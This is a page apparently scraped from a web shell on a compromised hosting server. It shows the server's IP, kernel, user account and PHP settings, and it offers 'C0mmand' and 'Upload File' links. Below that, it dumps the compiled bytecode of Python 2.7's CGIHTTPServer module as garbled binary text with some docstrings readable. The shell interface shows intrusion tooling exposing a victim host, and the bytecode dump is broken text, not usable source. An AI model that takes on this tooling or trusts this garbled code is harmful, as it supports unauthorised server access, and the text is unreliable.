Server IP : 111.118.215.189 / Your IP : 3.16.78.226 Web Server : Apache System : Linux md-in-83.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : a1673wkz ( 2475) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/lib64/python2.7/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
� m��fc@s�dZdZdgZddlZddlZddlZddlZddlZddlZddl Z dej fd��YZd�Ze ad�Zd�Zeejd �Zed kr�e�ndS(s�CGI-savvy HTTP Server. This module builds on SimpleHTTPServer by implementing GET and POST requests to cgi-bin scripts. If the os.fork() function is not present (e.g. on Windows), os.popen2() is used as a fallback, with slightly altered semantics; if that function is not present either (e.g. on Macintosh), only Python scripts are supported, and they are executed by the current process. In all cases, the implementation is intentionally naive -- all requests are executed sychronously. SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL -- it may execute arbitrary Python code or external programs. Note that status code 200 is sent prior to execution of a CGI script, so scripts cannot send other status codes such as 302 (redirect). s0.4tCGIHTTPRequestHandleri����NcBs�eZdZeed�Zeed�Zeed�ZdZd�Z d�Z d�Zdd gZd �Z d�Zd�ZRS( s�Complete HTTP server with GET, HEAD and POST commands. GET and HEAD also support running CGI scripts. The POST command is *only* implemented for CGI scripts. tforktpopen2tpopen3icCs-|j�r|j�n|jdd�dS(sRServe a POST request. This is only implemented for CGI scripts. i�sCan only POST to CGI scriptsN(tis_cgitrun_cgit send_error(tself((s%/usr/lib64/python2.7/CGIHTTPServer.pytdo_POST6s cCs*|j�r|j�Stjj|�SdS(s-Version of send_head that support CGI scriptsN(RRtSimpleHTTPServertSimpleHTTPRequestHandlert send_head(R((s%/usr/lib64/python2.7/CGIHTTPServer.pyRBs cCsittj|j��}|jdd�}|| ||d}}||jkre||f|_tStS(s2Test whether self.path corresponds to a CGI script. Returns True and updates the cgi_info attribute to the tuple (dir, rest) if self.path requires running a CGI script. Returns False otherwise. If any exception is raised, the caller should assume that self.path was rejected as invalid and act accordingly. The default implementation tests whether the normalized url path begins with one of the strings in self.cgi_directories (and the next character is a '/' or the end of the string). t/i( t_url_collapse_pathturllibtunquotetpathtfindtcgi_directoriestcgi_infotTruetFalse(Rtcollapsed_pathtdir_septheadttail((s%/usr/lib64/python2.7/CGIHTTPServer.pyRIss/cgi-bins/htbincCs t|�S(s1Test whether argument path is an executable file.(t executable(RR((s%/usr/lib64/python2.7/CGIHTTPServer.pyt is_executableascCs(tjj|�\}}|j�dkS(s.Test whether argument path is a Python script.s.pys.pyw(s.pys.pyw(tosRtsplitexttlower(RRRR((s%/usr/lib64/python2.7/CGIHTTPServer.pyt is_pythonesc(Cs�|j}|j\}}|jdt|�d�}xv|dkr�|| }||d}|j|�}tjj|�r�||}}|jdt|�d�}q7Pq7W|jd�}|dkr�|| ||d}}nd}|jd�}|dkr|| ||} }n |d} }|d| } |j| �}tjj|�sq|j dd| �dStjj |�s�|j d d | �dS|j| �}|s |jp�|j p�|js�|j d d| �dS|j|�s |j d d| �dSntjtj�} |j�| d <|jj| d<d| d<|j| d<t|jj�| d<|j| d<tj|�}|| d<|j|�| d<| | d<|r�|| d<n|j�}||jdkr�|| d<n|jd| d<|jjd�}|r�|j �}t|�dkr�ddl!}ddl"}|d| d<|dj#�dkr�y|j$|d�}Wn|j%k r�q�X|j d�}t|�dkr�|d| d <q�q�q�n|jj&dkr�|jj(| d!<n|jj&| d!<|jjd"�}|r4|| d#<n|jjd$�}|rY|| d%<ng}xW|jj)d&�D]C}|d d'kr�|j*|j+��qr||d(j d)�}qrWd)j,|�| d*<|jjd+�}|r�|| d,<nt-d|jj.d-��}|r(d.j,|�| d/<nxdCD]}| j/|d�q/W|j0d0d1�|j1d2d3�}|jr�| g}d4|kr�|j*|�nt2�}|j3j4�tj5�}|dkr;tj6|d�\}}x<t7j7|j8gggd�dr|j8j9d�s�Pq�q�W|r7|j:d5|�ndSyqytj;|�Wntj<k renXtj=|j8j>�d�tj=|j3j>�d�tj?||| �Wq�|jj@|jA|j�tjBd6�q�XnddlC}|g} |j|�rItDjE}!|!j#�jFd7�r6|!d8 |!d9}!n|!d:g| } nd4|kre| j*|�n|jGd;|jH| ��ytI|�}"WntJtKfk r�d}"nX|jL| d<|jMd=|jMd>|jMd?| �}#|jj#�d@kr|"dkr|j8j9|"�}$nd}$xBt7j7|j8jNgggd�dr^|j8jNjOd�sPqqW|#jP|$�\}%}&|j3jQ|%�|&r�|j:dA|&�n|#jRjS�|#jTjS�|#jU}'|'r�|j:d5|'�n |jGdB�dS(DsExecute a CGI script.Riit?ti�sNo such CGI script (%r)Ni�s#CGI script is not a plain file (%r)s&CGI script is not a Python script (%r)s!CGI script is not executable (%r)tSERVER_SOFTWAREtSERVER_NAMEsCGI/1.1tGATEWAY_INTERFACEtSERVER_PROTOCOLtSERVER_PORTtREQUEST_METHODt PATH_INFOtPATH_TRANSLATEDtSCRIPT_NAMEtQUERY_STRINGtREMOTE_HOSTtREMOTE_ADDRt authorizationii����t AUTH_TYPEtbasict:tREMOTE_USERtCONTENT_TYPEscontent-lengthtCONTENT_LENGTHtreferertHTTP_REFERERtaccepts it,tHTTP_ACCEPTs user-agenttHTTP_USER_AGENTtcookies, tHTTP_COOKIEi�sScript output followst+t t=sCGI script exit status %#xisw.exei����i����s-uscommand: %ststdintstdouttstderrtenvtposts%ssCGI script exited OK(R+R,R4R:R<R6(VRRRtlenttranslate_pathRtisdirtrfindtexistsRtisfileRt have_forkthave_popen2thave_popen3Rtcopytdeepcopytenvirontversion_stringtservertserver_nametprotocol_versiontstrtserver_porttcommandRRtaddress_stringtclient_addresstheaderst getheadertsplittbase64tbinasciiRtdecodestringtErrort typeheadertNonettypetgetallmatchingheaderstappendtstriptjointfiltert getheaderst setdefaultt send_responsetreplacet nobody_uidtwfiletflushRtwaitpidtselecttrfiletreadt log_errortsetuidterrortdup2tfilenotexecvethandle_errortrequestt_exitt subprocesstsysRtendswithtlog_messagetlist2cmdlinetintt TypeErrort ValueErrortPopentPIPEt_socktrecvtcommunicatetwriteRBtcloseRAt returncode((RRtdirtresttitnextdirtnextrestt scriptdirtquerytscriptt scriptnamet scriptfiletispyRCtuqrestthostR.R]R^tlengthR5R7tlinetuatcotkt decoded_querytargstnobodytpidtstsR}tcmdlinetinterptnbytestptdataRARBtstatus((s%/usr/lib64/python2.7/CGIHTTPServer.pyRjs8 % !( (t__name__t __module__t__doc__thasattrRRKRLRMtrbufsizeRRRRRRR(((s%/usr/lib64/python2.7/CGIHTTPServer.pyR#s cCs�|jd�}g}xM|d D]A}|dkr?|j�q |r |dkr |j|�q q W|r�|j�}|r�|dkr�|j�d}q�|dkr�d}q�q�nd}ddj|�|f}dj|�}|S(s` Given a URL path, remove extra '/'s and '.' path elements and collapse any '..' references and returns a colllapsed path. Implements something akin to RFC-2396 5.2 step 6 to parse relative paths. The utility of this function is limited to is_cgi method and helps preventing some security attacks. Returns: A tuple of (head, tail) where tail is everything after the final / and head is everything before it. Head will always start with a '/' and, if it contains anything else, never have a trailing '/'. Raises: IndexError if too many '..' occur within the path. Ri����s..t.R!(R\tpopReRg(Rt path_partst head_partstpartt tail_partt splitpathR((s%/usr/lib64/python2.7/CGIHTTPServer.pyR /s& cCs�tr tSyddl}Wntk r.dSXy|jd�daWn3tk r{dttd�|j���anXtS(s$Internal routine to get nobody's uidi����NR�iicSs|dS(Ni((tx((s%/usr/lib64/python2.7/CGIHTTPServer.pyt<lambda>gs(R�tpwdtImportErrortgetpwnamtKeyErrortmaxtmaptgetpwall(R�((s%/usr/lib64/python2.7/CGIHTTPServer.pyRm[s &cCs<ytj|�}Wntjk r*tSX|jd@dkS(sTest for executable file.iIi(RtstatRvRtst_mode(Rtst((s%/usr/lib64/python2.7/CGIHTTPServer.pyRks cCstj||�dS(N(R ttest(tHandlerClasstServerClass((s%/usr/lib64/python2.7/CGIHTTPServer.pyR�tst__main__(R�t__version__t__all__RR~RtBaseHTTPServerR RqRNR RR RbR�RmRt HTTPServerR�R�(((s%/usr/lib64/python2.7/CGIHTTPServer.pyt<module>s& � *